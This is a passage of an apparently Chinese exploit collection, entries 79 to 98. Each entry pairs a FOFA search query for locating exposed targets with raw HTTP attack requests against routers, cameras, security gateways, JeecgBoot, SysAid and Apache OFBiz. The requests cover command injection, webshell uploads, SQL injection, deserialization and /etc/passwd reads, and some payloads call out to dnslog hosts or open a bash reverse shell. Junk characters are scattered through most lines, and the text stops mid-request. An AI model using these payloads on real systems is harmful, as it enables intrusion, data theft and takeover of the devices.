9 Y5 v7 I0 F0 z5 I5 ~8 u% m/Applications/SkillDevelopAndEHS/8 v/ b# \( K! B9 H4 v7 z
------YsOxWxSvj1KyZow1PTsh98fdu6l--
9 K' ?$ Y* i0 n2 x" J/ O/ k3 T2 n9 d8 M+ w" Y$ }
6 e$ R: K& x Q# O* B; @' }GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.10 _. G& G# U/ s9 n# n% Q/ y2 Y) J: t2 |
Host: x.x.x.x
+ g" _9 h$ U. J8 r' c, |3 u Z; w7 t5 g& B$ T' z- V
% h) c% N- q( m6 Q; t
79. BYTEVALUE 百为流控路由器远程命令执行$ A) B' t% f1 i/ n
FOFA:BYTEVALUE 智能流控路由器
6 {9 K: J. L, ]& u8 }1 CGET /goform/webRead/open/?path=|id HTTP/1.1+ J v& k% v- |4 v, L
Host:IP9 I! N9 M6 F F6 g+ q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
4 m& x- n# x6 f' A `7 jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 R# L: J3 d% l% |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 t# Y4 ^! j6 P1 m4 V4 f! LAccept-Encoding: gzip, deflate
6 ], s a& Q6 p5 RConnection: close. P8 b5 g7 U, A" ~, O$ s
Upgrade-Insecure-Requests: 1
o6 q; O( d, `2 p* k+ y, ~9 k; y/ Z6 y9 f" J
1 ^; E* s% h5 K
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传* t, a9 h+ c2 {+ e5 H* @5 u8 Q3 _
FOFA:app="速达软件-公司产品"2 y! @9 w. o3 O" E
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
U2 D5 U! \4 Y2 e5 o( i: q% ?Host: x.x.x.x+ P6 g4 p- N& x1 \0 F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 T; p7 |7 `( l7 P& YContent-Length: 27; Z3 v: T% S. H' e: r7 I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 i7 ]: g, l6 C+ u5 l6 zAccept-Encoding: gzip, deflate: Q0 \# X8 K x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* R0 D2 _! z6 {6 y8 o1 u2 R3 ?
Connection: close
, i6 B& g2 r" Z4 b& k5 U( g9 OContent-Type: application/octet-stream
+ Z# N& D- M5 }. D" PUpgrade-Insecure-Requests: 1
6 B% s" M8 S, T$ ^+ h0 C' ~ o% F
/ R5 P/ X) O- r; h<% out.print("oessqeonylzaf");%>) B0 `4 ]. i6 D6 k% A' E9 s
* ~' o% g6 t- L) X: d2 B
/ g- Y- b# H# W0 `. n, XGET /xykqmfxpoas.jsp HTTP/1.1( `, Q$ [5 p* U' H( k& {
Host: x.x.x.x
' j8 s f2 Z% dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: O& E( f; {- j. s
Connection: close
3 M* ^, \1 G5 [) Y/ C4 t! @Accept-Encoding: gzip: G) I: Z8 G4 n1 _
$ B2 h9 H! M) U- Z& ^
( W/ K1 \2 _/ Z7 d) j
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露1 a1 U6 i. |3 z4 _! W: z
FOFA:app="uniview-视频监控"1 y7 U. ^$ ?6 r' T+ E
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
l3 V0 I2 L1 R; y4 A% VHost: x.x.x.x
' u; x4 A L# U$ a$ NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* [ [& o5 I8 W7 DConnection: close
e* k7 S0 q/ a% N2 ?! vAccept-Encoding: gzip/ N3 f$ m6 Z" e6 b
# f% ^0 D4 m7 ?6 n- [
# J! y9 E6 y1 _4 S0 k% o- F82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行4 R9 n% Z$ m% K6 A+ ]& j! q6 [
FOFA:app="思福迪-LOGBASE"
5 N7 K! v3 p; jPOST /bhost/test_qrcode_b HTTP/1.14 g+ F8 Y6 A0 _; L
Host: BaseURL
% v( E$ c$ E$ u7 n3 _# t( {User-Agent: Go-http-client/1.1
$ I! g6 q9 [6 T" N7 O$ wContent-Length: 23
! N2 u& {8 M$ z* S( I9 W1 [Accept-Encoding: gzip
5 T3 D' M% u9 EConnection: close
" Z3 e0 x/ w8 j+ MContent-Type: application/x-www-form-urlencoded
- S J r r" n" B8 r# u' {Referer: BaseURL/ c2 u5 S, ?) v( x7 |$ o; [
" W2 u8 l# C' X" J) }$ Bz1=1&z2="|id;"&z3=bhost
2 r% ]1 c- e' Q( U% D2 G9 Q* w; K1 U5 T
8 |( C, d2 v5 ~2 y# u. X83. JeecgBoot testConnection 远程命令执行
' D/ s. F, ^/ ~/ ]* [ \/ e% tFOFA:title=="JeecgBoot 企业级低代码平台"8 K+ w* B1 H8 Z
: _: ?' z; r9 `8 O) F9 F9 A1 a
4 a% N: K6 B1 y; OPOST /jmreport/testConnection HTTP/1.1% D) N4 Z: h( B4 _1 {
Host: x.x.x.x+ i9 r/ L {, v6 b5 ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 i) i: I7 c2 Y6 b9 M( QConnection: close
8 r# _0 N7 d% ]Content-Length: 88811 x* v$ e% R, r1 q V& q' t8 T3 Z; t5 l
Accept-Encoding: gzip& d+ ~' Y% A$ l' m# ^+ b5 w
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"; c0 H+ e* G0 D' \
Content-Type: application/json
- l, o: o; N ]. l/ j) t
- {0 e: S4 b2 [- |PAYLOAD
; B0 V) e0 a/ ^ N+ W% v2 ?
8 C2 f- g/ E( `+ L7 j84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
' a, P2 @/ L2 L& S9 }! uFOFA:title=="JeecgBoot 企业级低代码平台"
" a) T3 I j' T W2 K3 i
7 n: a% Y6 f& t
. q L+ X- I0 [# s2 T% i
; ]0 V# ]0 b' K8 d5 H2 V& ^0 n, UPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
" p9 L( g% Y; C9 L% b5 sHost: 192.168.40.130:8080
9 v$ B2 e& [/ X5 y, q8 I/ EUser-Agent: curl/7.88.1. h& J$ B3 C L2 ?
Content-Length: 156
( o$ i* U9 D, L. K* C; A9 KAccept: */*
4 O# G: }% O. L8 i% D7 g2 N5 Y1 i eConnection: close; N* ~" h) m0 `, v( r1 E
Content-Type: application/json5 `/ R, ~: D. X) o5 J. z8 N
Accept-Encoding: gzip+ K% P5 ^* v/ b8 a) |4 }
+ o. A @* ~4 m{& r6 i n3 {: j# t, d
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
6 j, M$ ~6 S! Q4 f9 d0 J6 ^ "type": "0"
( a( H2 W) v4 _1 Z/ {! a" R1 p}4 \, x. w2 S3 _( `+ B$ j
2 g9 R3 g. U8 L" Z8 _+ S# s. n
7 ^) N2 ^0 r1 |. d: K85. SysAid On-premise< 23.3.36远程代码执行- b4 x$ n1 ]: D6 n1 I5 d3 Z
CVE-2023-47246/ t% {$ ?) v; u6 o# }
FOFA:body="sysaid-logo-dark-green.png"
0 R& o: ]' F3 `8 AEXP数据包如下,注入哥斯拉马
( J( d# [$ S2 a" ]; t9 @POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1( y) n* R, K( e$ b9 z4 P* [
Host: x.x.x.x
' d* D; T3 x8 F- oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 o. @- c. z9 j, I5 E( w
Content-Type: application/octet-stream2 R' |+ F3 f4 i3 l3 J3 B4 ] _' j
Accept-Encoding: gzip
1 `; T5 w/ L% A" O9 X! ~. \& A
5 T8 m' F/ \4 E" U3 {0 yPAYLOAD
4 V) f* l L! ?1 O8 m$ u' b, `6 H
1 F1 \, L& n+ r* r F回显URL:http://x.x.x.x/userfiles/index.jsp
9 z6 @9 a6 B" R* a3 [/ M3 U0 B1 Y
# u& X I g+ n/ a. U6 E86. 日本tosei自助洗衣机RCE: A! k1 ?4 ~: K* ?" S3 @
FOFA:body="tosei_login_check.php"
/ X- r* b. A) sPOST /cgi-bin/network_test.php HTTP/1.1
+ r/ ~8 l% v8 T9 B( i$ [. THost: x.x.x.x
2 q) o" n% g7 G5 ]& d$ yUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
8 j; a3 Q4 O' g4 j9 kConnection: close
/ Z; n* Q7 t5 H4 D" lContent-Length: 44
W8 {( _5 G4 k5 ~Accept: */*
9 C: p7 ~1 Z; m9 l0 t# OAccept-Encoding: gzip
1 X' s( N$ w3 u8 y2 X& `Accept-Language: en
) c1 J5 v' |! j) s M5 E8 MContent-Type: application/x-www-form-urlencoded: j% Y) {9 n3 a8 |) |
( T9 N# k% f7 L- Vhost=%0acat${IFS}/etc/passwd%0a&command=ping9 ]: B' f/ ?+ \7 K9 S- g
6 K v- K5 t7 k, k6 t. e4 R
1 L7 P+ U( ^: P% F, ~
87. 安恒明御安全网关aaa_local_web_preview文件上传
( B# l1 T g' u6 X9 VFOFA:title="明御安全网关"
3 m8 y2 A4 T% IPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1$ ^/ d- y, y* W2 ~0 n
Host: X.X.X.X' @* H3 h6 X6 E, M, p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15. y: L) B% T+ G# u" @. X
Connection: close
7 Y7 f6 ^ Y: J) y# GContent-Length: 1987 Z& F! P7 F' |7 k& v
Accept-Encoding: gzip' {3 w& N, s9 _4 x
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd1 {) F! \ q2 \! o
# `3 G/ \6 i1 O6 x0 D! t* d% }
--qqobiandqgawlxodfiisporjwravxtvd4 T# t+ E. i$ L# ~% J* S
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"6 W0 ~3 B8 l* S7 A
Content-Type: text/plain# f# w9 B+ h7 V% }6 ~: r- e
3 V, k. w* p+ m& \9 S$ O
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
) b, m. g& z3 I* G--qqobiandqgawlxodfiisporjwravxtvd--
/ U3 L! s8 S0 x4 }6 C0 r) G. E6 e7 R. f6 b2 ?# z; h# V4 v
2 U, x" c- A4 E# F
/jfhatuwe.php
" B& y+ }- _# N$ X' l" V' t0 @. W- I! I$ @& n' h; L; n5 t$ b3 Q
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
; e, R* m2 C, ]" B) B3 fFOFA:title="明御安全网关"/ a( F! k# ?" o! M. E
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1$ K% B5 k4 W ~! p9 Z% E
Host: x.x.x.xx.x.x.x
# p- ?0 t7 q/ \; u0 \: w* sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
- l) |) ^& I* I: r) |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& X$ n# L) H S/ ]* s/ WAccept-Encoding: gzip, deflate
& s( B/ p! l/ |* gAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 Z2 S) a! h2 ^) R1 M) F" I$ y5 H' LConnection: close4 G( J4 P, i P( e( y* }, L3 M7 D
! J4 Q" H E1 O' z+ x( z; q
# z9 O* h4 \. ^, S) w# s& F
/astdfkhl.php: M( { x( v0 q! p" R
- _, n! m+ \1 X. j
89. 致远互联FE协作办公平台editflow_manager存在sql注入& @. W9 R& c" I( C ^8 X6 M6 P9 {: j- D
FOFA:title="FE协作办公平台" || body="li_plugins_download"
, p& p. Q: b# k% P1 j2 B7 IPOST /sysform/003/editflow_manager.js%70 HTTP/1.12 P; v1 g3 l7 B! F# U9 P3 z$ _
Host: x.x.x.x
6 l% {0 X4 C% y5 a4 xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# x8 _7 A* _" c; b# e) c# ]9 H
Connection: close
7 G, X* y, p7 eContent-Length: 41
: m6 g; X5 Q$ J: d& JContent-Type: application/x-www-form-urlencoded# N3 t7 W0 R& x, R
Accept-Encoding: gzip% _4 ]! E) e8 \$ i" E1 u
: o$ h- f+ q# u9 i' E( L
option=2&GUID=-1'+union+select+111*222--+
3 I/ l7 j9 l3 H: D$ X6 A' ~! |1 N0 M* G3 s3 j
8 B. L; }+ ^3 B1 {
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
( o" i2 `/ s# }3 |0 KFOFA:icon_hash="-1830859634"2 d1 G4 M: e6 e7 ^
POST /php/ping.php HTTP/1.1! s+ \) U; t- k+ Q7 ~
Host: x.x.x.x
8 V5 W* F0 Z1 Y0 a" q# E# E( cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.01 Y2 V- y6 g; A" x0 W
Content-Length: 51
# m& e6 n$ y7 e8 }7 b2 _Accept: application/json, text/javascript, */*; q=0.01; C2 r0 G/ p. x
Accept-Encoding: gzip, deflate
o8 E% s {. OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 w' M- K8 L$ [5 X; I2 X
Connection: close$ K6 ~$ g' z4 C1 X
Content-Type: application/x-www-form-urlencoded
( a m& B O2 ~X-Requested-With: XMLHttpRequest
$ h! v$ x I0 b4 ^3 {! X4 l
/ X9 R# k; q' {4 Y6 }2 V% D# kjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig' P6 @- z* o9 r5 [+ q
b5 E4 n! |7 e2 d6 J
" y" z4 f! z# Q% y6 o" N5 z9 I: U
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取: l( O$ w3 R$ s/ q$ M0 z
FOFA:title="综合安防管理平台"
, C; W c% A9 _$ h* ~GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1( d6 \ E0 z% t7 ]/ A- e
Host: your-ip
7 t' d" h, K' j5 o" ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
9 j F9 T: _3 Z5 l9 } f- eAccept-Encoding: gzip, deflate
, ?: K; Q( q- L* U; W: ?Accept: */*
+ B3 j+ S. }; y& s' CConnection: keep-alive/ M9 c/ k. ]4 m( B6 W
% f2 ~( Q* C8 \0 y
$ W( g s! k$ ^0 t5 T
# j% R& ]9 ]/ z92. 海康威视运行管理中心session命令执行. C3 ]" p' g/ j8 v) N1 }+ I4 d0 c1 Q! W
Fastjson命令执行7 u8 G, |: G. c
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
# M* y# j1 a3 d3 L3 P8 h9 p4 U! gPOST /center/api/session HTTP/1.1
0 w( P* P! p* C& NHost:/ U1 R* C0 \. p/ V; _8 }
Accept: application/json, text/plain, */*# J( |& Z1 r; D1 M7 B5 r
Accept-Encoding: gzip, deflate
/ U7 ]. q* ]1 g# m0 w; KX-Requested-With: XMLHttpRequest
% Z5 k9 I5 l. `' X9 u |2 hContent-Type: application/json;charset=UTF-8
6 f1 t6 r6 W; v2 r8 z( K+ RX-Language-Type: zh_CN. y, [' u4 z% p1 R2 c! `$ g
Testcmd: echo test
3 [3 m" Z7 {* Z v, Y Q$ `( sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
% G. I. d q0 y8 [6 ]Accept-Language: zh-CN,zh;q=0.9
# C7 E' h9 v3 QContent-Length: 57786 \. I; Z. V; z- q' q4 m( E J7 M
* j c; d D- P2 R" ?PAYLOAD
- u: ^. S o- ~
( A* }5 u& v6 q4 P
& ]1 m7 ?- H0 J) x; {* z93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
! i/ o! p ~/ x! g! ?: ^! e1 l8 CFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="8 b* z, P: F, H
POST /?g=app_av_import_save HTTP/1.1
1 o, M! `7 L9 a& J8 AHost: x.x.x.x$ d5 E% J3 J/ e; R* Q( W
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx% q1 a- x% r5 i& i
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
- H6 X) _7 J) m# c- \; O% |- `6 [6 ?+ q4 n" h
------WebKitFormBoundarykcbkgdfx9 h2 j& v7 \# e! Z
Content-Disposition: form-data; name="MAX_FILE_SIZE"
9 H$ `; C7 V2 s; `
. O, w! G) ^1 y% p5 I10000000
1 z5 @. k# w( M8 `% V) D------WebKitFormBoundarykcbkgdfx2 j6 }! \2 j$ d( y) E
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt" l. b6 u* E e. C! b( T
Content-Type: text/plain. x! _" |" z: d! T9 V5 @- E, t
; [% `6 {7 t( m
wagletqrkwrddkthtulxsqrphulnknxa X( x* r$ T Y
------WebKitFormBoundarykcbkgdfx
8 o2 r8 E5 ~0 I& F7 c7 P- FContent-Disposition: form-data; name="submit_post"
) z$ A, E) r0 N3 K5 O& W+ J. F
' {; Y; T* s6 z0 a" hobj_app_upfile
9 U* ~% H& {) E/ `! j# }------WebKitFormBoundarykcbkgdfx
2 ^; n1 W7 Z8 FContent-Disposition: form-data; name="__hash__"
8 q3 W7 F' ?4 I9 w5 V1 b- m: p. ~( T" i0 C
0b9d6b1ab7479ab69d9f71b05e0e94459 Y' x% a; s4 n; p" H: v; A
------WebKitFormBoundarykcbkgdfx--
+ `" d; ^" n1 n, F5 m
" \( @& D6 f0 P/ N; R* o4 j3 |) ]0 c4 t H! G2 L$ [6 ?: V
GET /attachements/xlskxknxa.txt HTTP/1.1
; m) U% t9 P2 [$ ?, y9 [Host: xx.xx.xx.xx
2 y2 ^: f1 A( n; \7 `User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
& I9 s& d+ T7 a7 E( }# x5 O# J
8 V* D3 B, m/ F; o2 b; d' ]
4 w) P' ^( N& G& b+ U7 Q1 d8 i+ Q94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传! l& B/ E9 [+ \- l7 d
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="/ {& t2 Y7 |7 f" S2 g- o
POST /?g=obj_area_import_save HTTP/1.1
$ _6 x8 V/ ~, V3 |( Q2 yHost: x.x.x.x/ d; l% O1 S- q) I0 Q' i) N8 N
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt6 S/ F! c3 E4 g: m# V. S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
6 l) d+ t; ^# y/ Y8 C" L% A3 G* a4 j" h- r
------WebKitFormBoundarybqvzqvmt
8 n! m: {. N, X5 m$ u* cContent-Disposition: form-data; name="MAX_FILE_SIZE"
6 j: O. W2 ]& e, [" I7 U
% E' Z5 M9 X9 E* e) t6 P3 F10000000
3 _+ o$ \1 `, S* J2 \1 R& r; \------WebKitFormBoundarybqvzqvmt9 O2 `! L: u# p
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt") O$ V0 X9 t" U
Content-Type: text/plain
; s% M0 h9 r0 x
+ a r. i t; v6 [" i8 v; Fpxplitttsrjnyoafavcajwkvhxindhmu
" F" e1 x5 R4 w' y------WebKitFormBoundarybqvzqvmt
) p. b+ W# P! @: CContent-Disposition: form-data; name="submit_post"
8 F3 B! m: Q; a8 m" f* h2 B
# V1 `" O4 ^# F0 t! `- K# f% Mobj_app_upfile7 H2 }, Y$ y6 s7 w! _- U% g( S
------WebKitFormBoundarybqvzqvmt
; o' e# N V d* E6 zContent-Disposition: form-data; name="__hash__"
4 }, l' N4 b' N
0 K$ m p" v5 D2 N0b9d6b1ab7479ab69d9f71b05e0e9445$ ?1 M [! A0 I& e0 E
------WebKitFormBoundarybqvzqvmt--0 E7 k" O+ v- R
( e' D" i o4 m- @1 \1 v7 s" `, a) d/ j+ o. w5 G- o ~; Q
( r: h! m& _, W
GET /attachements/xlskxknxa.txt HTTP/1.1
" R) j: _; g( _- z+ X5 s/ uHost: xx.xx.xx.xx
$ G4 M; h- n8 t# `# L {' Z+ lUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+ A0 t; Y/ x8 X, Y
4 N W) t2 u( l! l" {5 B e& ~7 f* G: ?& {' D) S
- @9 Q1 k4 R. ]; a; i8 Q3 R2 K
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
9 }4 l1 P5 t4 XCVE-2023-49070
0 f' M3 n+ R+ L4 hFOFA:app="Apache_OFBiz"
" [+ P) N' @! j! o0 Z. ZPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
% {. }3 T& s- d4 x/ x/ GHost: x.x.x.x& t3 z/ S% Z" V3 J
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
8 G2 C8 V) g& ], D: I6 D* cConnection: close
+ P! s9 w' \9 b+ ?" Z+ GContent-Length: 889
2 @9 W& u8 w) s$ ?: T" PContent-Type: application/xml
% j3 h2 f1 w4 I0 E7 h0 ]9 |Accept-Encoding: gzip) a: D& e; d. q/ X1 ?8 z& k
, |# j- L$ ?0 @<?xml version="1.0"?>
0 p8 F D+ Z6 x, I) }; ]5 r<methodCall>9 G8 a4 \& |( g7 `; d- L
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
8 R' P1 S9 K L <params>3 x+ H$ U% K- X- L: y5 [
<param>4 P7 D$ J L( }% M* K( n
<value>
0 p5 U+ T" H7 Y5 { <struct>1 \. z' S6 x" W+ a
<member>5 T+ H5 O/ N0 l2 l2 m! [
<name>test</name>+ W! u! C' U9 {* ?' Z- }8 R1 [6 _
<value>
8 i: o+ J+ D2 u1 R4 | <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable># P m3 k) H8 e
</value>' }! S0 r8 p* m5 L R
</member>5 r% G: ]8 a* B1 g b
</struct>+ W R3 [+ R2 g9 [& `
</value>
5 I% H- B. I. t8 o B. k </param># A! ?: t6 h) g3 v% r8 P- E# Q: ]
</params>/ ^. ]9 i! \' W* ]& X# b* v/ X3 G# w- y
</methodCall>; D {2 }/ _& L& k
: k0 D" _7 ]7 @& X" j1 }
) t: e5 r& k2 Y, Z, {用ysoserial生成payload
# v: e5 i3 [0 wjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"! p& v4 Z2 O" ?1 ~9 B4 \' O
' n0 X9 m- F+ d5 a3 T' a- p6 @
+ C+ b z# z* e' ^ |6 m% m7 Y将生成的payload替换到上面的POC' b& X: U5 g4 j! G# H
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
& Z. y0 v5 G/ s5 kHost: 192.168.40.130:8443
6 ^: x9 A3 R& Y$ i. jUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
9 R. h7 K; f7 ~/ HConnection: close
+ y; l4 A$ B- a: PContent-Length: 889+ Q$ c3 t4 _5 ]) q, w
Content-Type: application/xml% j/ g7 S" D) ^
Accept-Encoding: gzip
" w' N, e* w8 \- R
5 A: o& x' Y) a5 C# ^/ d, TPAYLOAD
- X: L7 t' F: I6 k7 ^, W( a4 w8 x8 h% e+ T, b+ \; _
96. Apache OFBiz 18.12.11 groovy 远程代码执行
" S$ N! f4 x( r7 bFOFA:app="Apache_OFBiz"
" T' e; ^9 X# M& M& H6 _1 U; i% aPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
, i3 J" t, E8 ?3 J( e4 zHost: localhost:8443/ W2 d3 R( ~2 I9 B2 n+ T/ f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
- M* n" V0 {4 l1 _1 p! ZAccept: */*4 K3 ~, a# ~4 E+ @: B. [
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 L4 P$ l1 {2 W2 v. @Content-Type: application/x-www-form-urlencoded" I( q) D3 C- d8 n& _* m O+ b" e6 J
Content-Length: 554 \$ ^) ^8 i8 E# ~4 @/ N' S
! ^3 ?; T+ _- n# q' g, a4 CgroovyProgram=throw+new+Exception('id'.execute().text);
1 e/ A; U9 F a3 ]* P: `3 N* ?: \2 N+ z1 h. i, h" Q" a7 e
6 \* u, D' z4 s; `# |2 c
反弹shell+ a6 X; H7 L) H# m! b( j" m
在kali上启动一个监听
% q4 i w( @3 M) Nnc -lvp 7777: {2 C4 w% H9 i' c) H- ]$ i/ ?! Y4 F5 F
4 N F$ j1 h8 f
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.11 | b; n( ~3 Q) k& m" l5 d
Host: 192.168.40.130:84435 h' Y/ Z1 `* I8 D% v h) j% D3 U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
( z+ z3 P! Q$ n- j, KAccept: */*
1 H/ _3 Z, D& Y. B/ qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 c! Y$ l9 q- \+ i/ r# D& } u: {! _# V
Content-Type: application/x-www-form-urlencoded& T" J' h/ J& Y5 M. n- H
Content-Length: 719 z% T5 e {' c, w, B+ `
0 K/ P- ]0 \1 E) lgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
Q6 G5 y3 L- `8 l& l
4 \/ ^ g4 z" _1 h6 M/ W% [) P$ ?97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行7 i7 q, W* a$ P ]* X0 a
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客", ~5 `" [' s9 V# T8 f: ?# W/ n
GET /passport/login/ HTTP/1.1) q# d" \5 {8 {% _4 {# S \" B
Host: 192.168.40.130:8085
: N v5 s6 O: t( \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* B" l2 ~2 f2 O- ]& w I
Accept-Encoding: gzip3 g( U' c- d, U; u# M3 d
Connection: close$ {# m8 Y* i/ q, N: J) M
Cookie: rememberMe=PAYLOAD( X! c9 \/ m) g. A" K: q& U
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"1 @6 V1 J4 q# i V; K- C% V
' e* M- E5 M* m. |% W" P2 P# C3 Y- O+ E) D# ~' Y# L/ K& j7 D$ t
98. SpiderFlow爬虫平台远程命令执行- }& U- m- ?& C1 n* h1 I: ?
CVE-2024-0195
8 `# u) t' e) kFOFA:app="SpiderFlow"( T. C. K, H& m
POST /function/save HTTP/1.1
, c4 d! b' a3 LHost: 192.168.40.130:8088
1 Y& Z. w- _6 yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.09 ?5 g* g, t1 e V" R1 ~& M8 o
Connection: close6 j, z* w4 D/ o; Z
Content-Length: 121
. Y5 }0 p1 J% h) r2 \Accept: */*
